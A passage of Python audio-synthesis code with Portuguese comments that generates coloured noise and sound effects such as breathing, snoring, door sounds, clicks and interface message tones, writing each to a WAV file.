# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rr=r
r = n.int16(r * float(2**15-1))
w.write('rosa.wav', f_a, r)
fator = 10.**(-9/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real par, imaginaria impar
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# realizando amostras temporais do ruído marrom
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rp=r
r = n.int16(r * float(2**15-1))
w.write('preto.wav', f_a, r)
#w.write('respira.wav', f_a, N(H((
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# ))))
#
#w.write('respira2.wav', f_a, N(H((
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# ))))
#
#
#w.write('respira3.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira4.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira5.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira6.wav', f_a, N(H((
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# ))))
#
#
#f0=110.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=1100.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca2.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=11000.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca3.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=410.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=adsr(v(f=ff,d=4.,nu=0.)*a_,S=-5.)
#
#w.write('pisca4.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
##### PISCA TTMPPC
#f0=110.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=1100.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca2_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=11000.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca3_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=410.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=adsr(v(f=ff,d=4.,nu=0.)*a_,S=-5.)
#
#w.write('pisca4_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
##### END TTMPPC
w.write('comendo6.wav', f_a, N(fala("O melhor que voce faz com a sua boca, eh servir de toca, para outra cabessa. Nao que voce meressa, esta oportunidade, que vem com a idade, de se curtir em mim.",ss=3500)))
w.write('comendo7.wav', f_a, N(fala("Diga aonde voce vai, que eu vou varrendo, diga aonda voce vai, que eu vou varrendo. Vou varrendo, vou varrendo vou varrendo. Vou varrendo, vou varrendo, vou varrendo.",ss=3500)))
#
#
#w.write('comendo.wav', f_a, N(fala("mahnamnahamhahamnahamhanhamnanhnahamha")))
#w.write('comendo2.wav', f_a, N(fala("manamnaamaamnaamanamnannaama")))
#w.write('comendo3.wav', f_a, N(fala("mnmnmmnmnmnnnm")))
#w.write('comendo4.wav', f_a, N(fala("mnmnmm nmnm nn nmnmnmn")))
#w.write('comendo5.wav', f_a, N(fala("mnhmnhmm nhmhnm nn nhmhnmhnhmn")))
#
#
#w.write('chorando_.wav', f_a, N(fala("bbbbuaaa bbbbbuaaa bbbbuaaa bbbuaaa")))
#
#
#w.write('chorando_2.wav', f_a, N(fala("buaaa bbuaaa buaaa buaaa")))
#
#
#
#w.write('chorando_3.wav', f_a, N(fala("buaaa nheee ee ee nheeee e eeeee bbuaaa buaaa nheeeee eee eeeee buaaa")))
#
#
#w.write('chorando_4.wav', f_a, N(fala("buaaa nheee ee hhh hhh hhh ee nheeehhhh h hh hhe e eeeee bbuhhh h hh haaa buaaa nhhhh hhh eeeee eee hhhhhh h heeeee buaaa")))
#
w.write('coma.wav', f_a, N(H((
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
)),.3))
w.write('coma2.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
)),.3))
w.write('coma3.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma4.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma5.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma6.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
)),.3))
w.write('coma7.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
)),.3))
w.write('coma8.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
)),.3))
w.write('respira7.wav', f_a, N(H((
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
))))
w.write('respira8.wav', f_a, N(H((
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
))))
w.write('respira9.wav', f_a, N(H((
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('respira91.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('respira92.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('dormindo.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
))))
# arroto3 arroto6 arroto 9 92
w.write('dormindo2.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
))))
w.write('dormindo2.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
))))
ronco=H((
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
))
w.write('dormindo3.wav', f_a, N(H((
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
))))
w.write('dormindo4.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
))))
w.write('dormindo5.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
))))
w.write('dormindo6.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
))))
w.write('dormindo7.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
))))
ronco2=H((
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
))
w.write('dormindo8.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
))))
w.write('dormindo9.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
))))
w.write('dormindo91.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
))))
w.write('dormindo92.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
))))
w.write('porta_abre.wav', f_a, N(v(200,fv=1./(7*2.),d=1.0,nu=20.)))
w.write('porta_abre2.wav', f_a, N(v(800,fv=1./(7*2.),d=1.0,nu=20.)))
w.write('porta_abre3.wav', f_a, N(v(800,fv=1.,d=.5,nu=20.,tabv=D_i)))
w.write('porta_abre4.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre5.wav', f_a, N(v(2800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre6.wav', f_a, N(v(2800,fv=1.,d=.5,nu=2.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre7.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=D_i)))
w.write('porta_abre8.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Q_i)))
w.write('porta_fecha.wav', f_a, N(v(200,fv=1./(7*2.),d=1.0,nu=20. , tabv=S_i*-1)))
w.write('porta_fecha2.wav', f_a, N(v(800,fv=1./(7*2.),d=1.0,nu=20. , tabv=S_i*-1)))
w.write('porta_fecha3.wav', f_a, N(v(800,fv=1.,d=.5,nu=20.,tabv=D_i)))
w.write('porta_fecha4.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i*-1)))
w.write('porta_fecha5.wav', f_a, N(v(2800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i*-1)))
w.write('porta_fecha6.wav', f_a, N(v(2800,fv=1.,d=.5,nu=2.,tabv=D_i,tab=Tr_i *-1)))
w.write('porta_fecha7.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=D_i *-1)))
w.write('porta_fecha8.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Q_i *-1)))
w.write('clique.wav', f_a, N(n.array([0]*100+[1]+[0]*10000)))
w.write('clique2.wav', f_a, N(adsr(v(fv=20,d=.2),S=-3.)))
w.write('clique3.wav', f_a, N(adsr(v(fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('clique4.wav', f_a, N(adsr(v(f=1000.,fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('clique5.wav', f_a, N(adsr(v(f=660.,fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('seleciona.wav', f_a, N(adsr(v(f=460.,fv=1.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('seleciona2.wav', f_a, N(adsr(v(f=460.,fv=10.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('cancela.wav', f_a, N(adsr(v(f=460.,fv=100.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('cancela2.wav', f_a, N(adsr(v(f=40.,fv=100.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('msgPos.wav', f_a, N(H((
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg.wav', f_a, N(H((
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos2.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg2.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg3.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos3.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(4./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos4.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(4./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(7./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg4.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(-6./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('perda.wav', f_a, N(H((
